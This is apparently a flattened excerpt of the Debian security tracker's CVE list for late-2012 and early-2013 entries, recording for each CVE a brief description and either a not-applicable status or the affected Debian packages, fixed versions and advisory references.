CVE-2012-6408 RESERVED CVE-2012-6407 RESERVED CVE-2012-6406 RESERVED CVE-2012-6405 RESERVED CVE-2012-6404 RESERVED CVE-2012-6403 RESERVED CVE-2012-6402 RESERVED CVE-2012-6401 RESERVED CVE-2012-6400 RESERVED CVE-2012-6399 RESERVED CVE-2012-6398 RESERVED CVE-2012-6397 (Cross-site scripting (XSS) vulnerability in Cisco WebEx Social ...) NOT-FOR-US: Cisco WebEx Social CVE-2012-6396 (Cisco NX-OS on Nexus 7000 series switches does not properly handle ...) NOT-FOR-US: Cisco NX-OS CVE-2012-6395 (Cisco Adaptive Security Appliances (ASA) devices with firmware 8.4 do ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2012-6394 RESERVED CVE-2012-6393 RESERVED CVE-2012-6392 (Cisco Prime LAN Management Solution (LMS) 4.1 through 4.2.2 on Linux ...) NOT-FOR-US: Cisco Prime LMS CVE-2012-6391 RESERVED CVE-2012-6390 RESERVED CVE-2012-6389 RESERVED CVE-2012-6388 RESERVED CVE-2012-6387 RESERVED CVE-2012-6386 RESERVED CVE-2012-6385 RESERVED CVE-2012-6384 RESERVED CVE-2012-6383 RESERVED CVE-2012-6382 RESERVED CVE-2012-6381 RESERVED CVE-2012-6380 RESERVED CVE-2012-6379 RESERVED CVE-2012-6378 RESERVED CVE-2012-6377 RESERVED CVE-2012-6376 RESERVED CVE-2012-6375 RESERVED CVE-2012-6374 RESERVED CVE-2012-6373 RESERVED CVE-2012-6372 RESERVED CVE-2012-6371 (The WPA2 implementation on the Belkin N900 F9K1104v1 router ...) NOT-FOR-US: Belkin router CVE-2012-6370 RESERVED CVE-2012-6369 (Cross-site scripting (XSS) vulnerability in the Troubleshooting ...) NOT-FOR-US: AgileBits 1Password CVE-2012-6368 RESERVED CVE-2012-6367 RESERVED CVE-2012-6366 RESERVED CVE-2012-6365 RESERVED CVE-2012-6364 RESERVED CVE-2012-6363 RESERVED CVE-2012-6362 RESERVED CVE-2012-6361 RESERVED CVE-2012-6360 (Cross-site scripting (XSS) vulnerability in IBM Intelligent Operations ...) NOT-FOR-US: IBM Intelligent Operations Center CVE-2012-6359 (IBM Tivoli Federated Identity Manager (TFIM) 6.2.0 before 6.2.0.11, ...) NOT-FOR-US: IBM Tivoli CVE-2012-6358 RESERVED CVE-2012-6357 (IBM Maximo Asset Management 7.5, Maximo Asset Management Essentials ...) NOT-FOR-US: IBM CVE-2012-6356 (IBM Maximo Asset Management 7.5, Maximo Asset Management Essentials ...) NOT-FOR-US: IBM CVE-2012-6355 (IBM Maximo Asset Management 6.2 through 7.5, Maximo Asset Management ...) NOT-FOR-US: IBM CVE-2012-6354 (The management GUI on the IBM SAN Volume Controller and Storwize V7000 ...) NOT-FOR-US: IBM CVE-2012-6353 RESERVED CVE-2012-6352 (The Session Manager in IBM Sterling Connect:Direct through 4.1.0.3 on ...) NOT-FOR-US: IBM Sterling Connect:Direct CVE-2012-6351 RESERVED CVE-2012-6350 (Cross-site scripting (XSS) vulnerability in the Web component in IBM ...) NOT-FOR-US: IBM Cognos TM1 CVE-2012-6349 RESERVED CVE-2012-6348 (Centrify Deployment Manager 2.1.0.283, as distributed in Centrify ...) NOT-FOR-US: Centrify CVE-2012-6347 RESERVED CVE-2012-6346 RESERVED CVE-2012-6345 RESERVED CVE-2012-6344 RESERVED CVE-2012-6343 RESERVED CVE-2012-6342 RESERVED NOT-FOR-US: Atlassian Confluence CVE-2012-6341 RESERVED CVE-2012-6340 RESERVED CVE-2012-6339 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: Cerberus FTP Server CVE-2012-6338 RESERVED CVE-2012-6337 (The Track My Mobile feature in the SamsungDive subsystem for Android ...) NOT-FOR-US: SamsungDive on Samsung Galaxy CVE-2012-6336 (The Missing Device feature in Lookout allows physically proximate ...) NOT-FOR-US: Lookout CVE-2012-6335 (The Anti-theft service in AVG AntiVirus for Android allows physically ...) NOT-FOR-US: AVG AntiVirus for Android CVE-2012-6334 (The Track My Mobile feature in the SamsungDive subsystem for Android ...) NOT-FOR-US: SamsungDive subsystem for Android CVE-2011-5251 (Open redirect vulnerability in forum/login.php in vBulletin 4.1.3 and ...) NOT-FOR-US: vBulletin CVE-2012-6333 (Multiple HVM control operations in Xen 3.4 through 4.2 allow local HVM ...) {DSA-2636-1} - xen 4.1.3-8 CVE-2012-6332 RESERVED CVE-2012-6331 RESERVED CVE-2012-6330 (The localization functionality in TWiki before 5.1.3, and Foswiki ...) - foswiki (bug #509864) CVE-2012-6329 (The _compile function in Maketext.pm in the Locale::Maketext ...) - perl 5.14.2-16 (bug #695224) [squeeze] - perl 5.10.1-17squeeze5 - foswiki (bug #509864) CVE-2012-6328 RESERVED CVE-2012-6327 RESERVED CVE-2012-6326 (VMware vCenter Server 4.1 before Update 3 and 5.0 before Update 2, and ...) NOT-FOR-US: vCenter CVE-2012-6325 (VMware vCenter Server Appliance (vCSA) 5.0 before Update 2 does not ...) NOT-FOR-US: VMware vCenter Server Appliance CVE-2012-6324 (Directory traversal vulnerability in VMware vCenter Server Appliance ...) NOT-FOR-US: VMware vCenter Server Appliance CVE-2013-0450 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0449 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0448 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java7) - openjdk-7 NOTE: Affects the Libraries component, likely part of IcedTea/OpenJDK CVE-2013-0447 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0446 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0445 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12.1-1 - openjdk-7 NOTE: icedtea fix: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/6527ae06da69 NOTE: openjdk-7 fixed in experimental: 7u13-2.3.6-1 CVE-2013-0444 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java7) - openjdk-7 7u3-2.1.6-1 NOTE: IcedTea commit: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/ce04db4aba39 CVE-2013-0443 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0442 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 NOTE: icedtea fix: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/6527ae06da69 CVE-2013-0441 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0440 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0439 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0438 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0437 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java7) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0436 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0435 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0434 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0433 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0432 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0431 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java7) - openjdk-7 7u3-2.1.6-1 NOTE: IcedTea commit: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/b09c28ff798f CVE-2013-0430 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0429 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0428 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0427 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0426 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0425 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0424 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0423 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0422 (Multiple vulnerabilities in Oracle Java 7 before Update 11 allow ...) - openjdk-6 (Only affects Java 7) - openjdk-7 7u3-2.1.4-1 NOTE: Exploitable on Linux http://www.openwall.com/lists/oss-security/2013/01/11/1 CVE-2013-0421 RESERVED CVE-2013-0420 (Unspecified vulnerability in the VirtualBox component in Oracle ...) - virtualbox 4.1.18-dfsg-2 (bug #698292) - virtualbox-ose (Vulnerable code not present) CVE-2013-0419 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0418 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Outside In CVE-2013-0417 (Unspecified vulnerability in the Sun Storage Common Array Manager ...) NOT-FOR-US: Sun Storage Common Array Manager CVE-2013-0416 (Unspecified vulnerability in the Siebel Enterprise Application ...) NOT-FOR-US: Oracle Siebel CVE-2013-0415 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Solaris CVE-2013-0414 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Solaris CVE-2013-0413 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-0412 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Solaris CVE-2013-0411 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows ...) NOT-FOR-US: Solaris CVE-2013-0410 (Unspecified vulnerability in the Agile EDM component in Oracle Supply ...) NOT-FOR-US: Oracle Supply Chain CVE-2013-0409 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-0408 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Solaris CVE-2013-0407 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-0406 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Solaris CVE-2013-0405 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Solaris CVE-2013-0404 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Solaris CVE-2013-0403 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Solaris CVE-2013-0402 (Heap-based buffer overflow in the Java Runtime Environment (JRE) ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0401 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-0400 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local ...) NOT-FOR-US: Solaris CVE-2013-0399 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local ...) NOT-FOR-US: Solaris CVE-2013-0398 RESERVED CVE-2013-0397 (Unspecified vulnerability in the Oracle Applications Framework ...) NOT-FOR-US: Oracle Applications Framework CVE-2013-0396 (Unspecified vulnerability in the Application Performance Management ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0395 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0394 (Unspecified vulnerability in the PeopleSoft HRMS component in Oracle ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0393 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Outside In CVE-2013-0392 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0391 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0390 (Unspecified vulnerability in the Oracle Applications Framework ...) NOT-FOR-US: Oracle Applications Framework CVE-2013-0389 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0388 (Unspecified vulnerability in the PeopleSoft HRMS component in Oracle ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0387 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0386 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0385 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0384 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0383 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0382 (Unspecified vulnerability in the Oracle Marketing component in Oracle ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0381 (Unspecified vulnerability in the Oracle CRM Technical Foundation ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0380 (Unspecified vulnerability in the Oracle Payroll component in Oracle ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0379 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-0378 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-0377 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0376 (Unspecified vulnerability in the Oracle Applications Framework ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0375 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0374 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-0373 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-0372 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-0371 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0370 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain product suite CVE-2013-0369 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0368 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0367 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0366 (Unspecified vulnerability in the Mobile Server component in Oracle ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0365 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-0364 (Unspecified vulnerability in the Mobile Server component in Oracle ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0363 (Unspecified vulnerability in the Mobile Server component in Oracle ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0362 (Unspecified vulnerability in the Mobile Server component in Oracle ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0361 (Unspecified vulnerability in the Mobile Server component in Oracle ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0360 (Unspecified vulnerability in the Application Performance Management ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0359 (Unspecified vulnerability in the APM - Application Performance ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0358 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0357 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0356 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0355 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0354 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0353 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0352 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0351 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0350 [writes content from TCP streams to public readable file /tmp/smtp.log] RESERVED - pktstat 1.8.5-3 (bug #701211) [squeeze] - pktstat (Vulnerable code not present) CVE-2013-0349 (The hidp_setup_hid function in net/bluetooth/hidp/core.c in the Linux ...) {DSA-2668-1} - linux 3.2.39-1 - linux-2.6 CVE-2013-0348 [sthttpd world-redable logdir] RESERVED NOT-FOR-US: sthttpd CVE-2013-0347 [webfs world-readable logdir] RESERVED - webfs (low; bug #701638) [wheezy] - webfs (Minor issue) [squeeze] - webfs (Minor issue) CVE-2013-0346 [tomcat world-readable logdir] RESERVED - tomcat6 (Log files are owned by tomcat:tomcat) CVE-2013-0345 [varnish world-readable logdir] RESERVED - varnish (Logfiles are owned by varnishlog:varnishlog) CVE-2013-0344 RESERVED CVE-2013-0343 (The ipv6_create_tempaddr function in net/ipv6/addrconf.c in the Linux ...) - linux (low) - linux-2.6 (low) CVE-2013-0342 [CreateID() creates serialized packet IDs for RADIUS] RESERVED - pyrad (bug #701151) NOTE: this is initially related to #700669 CVE-2013-0341 RESERVED CVE-2013-0340 RESERVED CVE-2013-0339 [CPU consumption DoS when performing string substitutions during external entities expansion] RESERVED {DSA-2652-1} - libxml2 2.8.0+dfsg1-7+nmu1 (bug #702260) CVE-2013-0338 (libxml2 2.9.0 and earlier allows context-dependent attackers to cause ...) {DSA-2652-1} - libxml2 2.8.0+dfsg1-7+nmu1 (bug #702260) CVE-2013-0337 [Directory /var/log/nginx is world readable] RESERVED - nginx (low; bug #701112) [squeeze] - nginx (Minor issue) [wheezy] - nginx (Minor issue) CVE-2013-0336 [DoS when connecting with a missing username/dn] RESERVED - 389-ds-base (bug #704077) CVE-2013-0335 (OpenStack Compute (Nova) Grizzly, Folsom (2012.2), and Essex (2012.1) ...) - nova 2012.1.1-14 (bug #701773) CVE-2013-0334 RESERVED CVE-2013-0333 (lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before ...) {DSA-2613-1} - rails 2.3.14.1 (bug #699226) - ruby-activesupport-2.3 2.3.14-6 (bug #699249) NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo CVE-2013-0332 (Multiple directory traversal vulnerabilities in ZoneMinder 1.24.x ...) {DSA-2640-1} - zoneminder 1.25.0-1 (bug #700912) CVE-2013-0331 (CloudBees Jenkins before 1.502 and LTS before 1.480.3 allows remote ...) - jenkins (bug #700761) CVE-2013-0330 (Unspecified vulnerability in CloudBees Jenkins before 1.502 and LTS ...) - jenkins (bug #700761) CVE-2013-0329 (Unspecified vulnerability in CloudBees Jenkins before 1.502 and LTS ...) - jenkins (bug #700761) CVE-2013-0328 (Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before ...) - jenkins (bug #700761) CVE-2013-0327 (Cross-site request forgery (CSRF) vulnerability in Jenkins master in ...) - jenkins (bug #700761) CVE-2013-0326 RESERVED - nova (low) [wheezy] - nova (Minor issue) CVE-2013-0325 (Multiple cross-site scripting (XSS) vulnerabilities in the Varnish ...) NOT-FOR-US: Drupal addon CVE-2013-0324 (Cross-site scripting (XSS) vulnerability in the Rendered links ...) NOT-FOR-US: Drupal addon CVE-2013-0323 (Cross-site scripting (XSS) vulnerability in the Display Suite module ...) NOT-FOR-US: Drupal addon CVE-2013-0322 (Cross-site scripting (XSS) vulnerability in Views in the Ubercart ...) NOT-FOR-US: Drupal addon CVE-2013-0321 (Cross-site scripting (XSS) vulnerability in Views in the Ubercart ...) NOT-FOR-US: Drupal addon CVE-2013-0320 (Cross-site request forgery (CSRF) vulnerability in the Taxonomy ...) NOT-FOR-US: Drupal addon CVE-2013-0319 (Cross-site scripting (XSS) vulnerability in the Yandex.Metrics module ...) NOT-FOR-US: Drupal addon CVE-2013-0318 (The admin page in the Banckle Chat module for Drupal does not properly ...) NOT-FOR-US: Drupal addon CVE-2013-0317 (Cross-site scripting (XSS) vulnerability in the Manager Change for ...) NOT-FOR-US: Drupal addon CVE-2013-0316 (The Image module in Drupal 7.x before 7.20 allows remote attackers to ...) - drupal7 7.14-2 (bug #701165) - drupal6 (Only affects Drupal 7) CVE-2013-0315 (The GateIn Portal export/import gadget in JBoss Enterprise Portal ...) NOT-FOR-US: GateIn Portal CVE-2013-0314 (The GateIn Portal export/import gadget in JBoss Enterprise Portal ...) NOT-FOR-US: GateIn Portal CVE-2013-0313 (The evm_update_evmxattr function in ...) - linux 3.2.39-1 - linux-2.6 (Vulnerable code not present) CVE-2013-0312 (389 Directory Server before 1.3.0.4 allows remote attackers to cause a ...) - 389-ds-base 1.3.0.3-1 CVE-2013-0311 (The translate_desc function in drivers/vhost/vhost.c in the Linux ...) - linux 3.2.41-1 - linux-2.6 (Vulnerable code not present) CVE-2013-0310 (The cipso_v4_validate function in net/ipv4/cipso_ipv4.c in the Linux ...) - linux 3.2.29-1 - linux-2.6 (Vulnerable code not present) CVE-2013-0309 (arch/x86/include/asm/pgtable.h in the Linux kernel before 3.6.2, when ...) - linux 3.2.32-1 - linux-2.6 (THP not in Squeeze) NOTE: Probably gone since 3.2.32, but I checked 3.2.41-2 CVE-2013-0308 (The imap-send command in GIT before 1.8.1.4 does not verify that the ...) - git (OpenSSL support is not enabled in Debian, see bug #701586) NOTE: http://marc.info/?l=git&m=136134619013145&w=2 NOTE: Further reference about SSL support in imap-send #434599 needs to be adressed first CVE-2013-0307 [XSS vulnerability] RESERVED - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/ CVE-2013-0306 (The form library in Django 1.3.x before 1.3.6, 1.4.x before 1.4.4, and ...) {DSA-2634-1} - python-django 1.4.4-1 (bug #701186) CVE-2013-0305 (The administrative interface for Django 1.3.x before 1.3.6, 1.4.x ...) {DSA-2634-1} - python-django 1.4.4-1 (bug #701186) NOTE: https://www.djangoproject.com/weblog/2013/feb/19/security/ CVE-2013-0304 RESERVED CVE-2013-0303 [Multiple code executions] RESERVED - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-006/ CVE-2013-0302 RESERVED CVE-2013-0301 [Multiple CSRF vulnerabilities] RESERVED - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/ CVE-2013-0300 [Multiple CSRF vulnerabilities] RESERVED - owncloud (Vulnerably code not present, only affects 4.5 branch) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/ CVE-2013-0299 [Multiple CSRF vulnerabilities] RESERVED - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/ CVE-2013-0298 [XSS vulnerability] RESERVED - owncloud (Vulnerably code not present, only affects 4.5 branch) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/ CVE-2013-0297 [XSS vulnerability] RESERVED - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/ CVE-2013-0296 [creates temp files with too wide permissions] RESERVED - pigz 2.2.4-2 (low; bug #700608) [squeeze] - pigz (Minor issue) CVE-2013-0295 [CreateID() creates serialized packet IDs for RADIUS] RESERVED CVE-2013-0294 [potentially predictable password hashing] RESERVED - pyrad 2.0-2 (low; bug #700669) [wheezy] - pyrad 1.2-1+deb7u2 [squeeze] - pyrad (Minor issue) CVE-2013-0293 [Lock screen accepts F2 to drop to shell] RESERVED - ovirt-node (bug #502024) CVE-2013-0292 (The dbus_g_proxy_manager_filter function in dbus-gproxy in Dbus-glib ...) - dbus-glib 0.100.1-1 (bug #700638; high) [squeeze] - dbus-glib 0.88-2.1+squeeze1 CVE-2013-0291 RESERVED CVE-2013-0290 (The __skb_recv_datagram function in net/core/datagram.c in the Linux ...) - linux (Introduced in 3.4, fixed in 3.8) - linux-2.6 (Introduced in 3.4) CVE-2013-0289 [missing SSL subject verification] RESERVED - isync 1.0.4-2.2 (low; bug #701052) [squeeze] - isync (Minor issue) NOTE: http://isync.git.sourceforge.net/git/gitweb.cgi?p=isync/isync;a=patch;h=914ede18664980925628a9ed2a73ad05f85aeedb CVE-2013-0288 (nss-pam-ldapd before 0.7.18 and 0.8.x before 0.8.11 allows ...) {DSA-2628-1} - nss-pam-ldapd 0.8.10-3 (bug #690319) CVE-2013-0287 (The Simple Access Provider in System Security Services Daemon (SSSD) ...) - sssd (Introduced in 1.9.0) NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/12 CVE-2013-0286 RESERVED CVE-2013-0285 (The nori gem 2.0.x before 2.0.2, 1.1.x before 1.1.4, and 1.0.x before ...) NOT-FOR-US: nori Ruby gem CVE-2013-0284 (Ruby agent 3.2.0 through 3.5.2 serializes sensitive data when ...) NOT-FOR-US: newrelic_rpm Ruby gem CVE-2013-0283 RESERVED CVE-2013-0282 (OpenStack Keystone Grizzly before 2013.1, Folsom 2012.1.3 and earlier, ...) - keystone 2012.1.1-13 (bug #700947) CVE-2013-0281 [DoS when remote CIB management enabled] RESERVED - pacemaker (low; bug #700923) [squeeze] - pacemaker (Minor issue) [wheezy] - pacemaker (Minor issue) CVE-2013-0280 REJECTED CVE-2013-0279 REJECTED CVE-2013-0278 REJECTED CVE-2013-0277 (ActiveRecord in Ruby on Rails before 2.3.17 and 3.x before 3.1.0 ...) {DSA-2620-1} - ruby-activerecord-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-0276 (ActiveRecord in Ruby on Rails before 2.3.17, 3.1.x before 3.1.11, and ...) {DSA-2620-1} - ruby-activemodel-3.2 3.2.6-3 - ruby-activerecord-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: The fix for 3.2 is present in ruby-activemodel-3.2, not ruby-activerecord-3.2 CVE-2013-0275 (Multiple cross-site scripting (XSS) vulnerabilities in Ganglia Web ...) - ganglia (low; bug 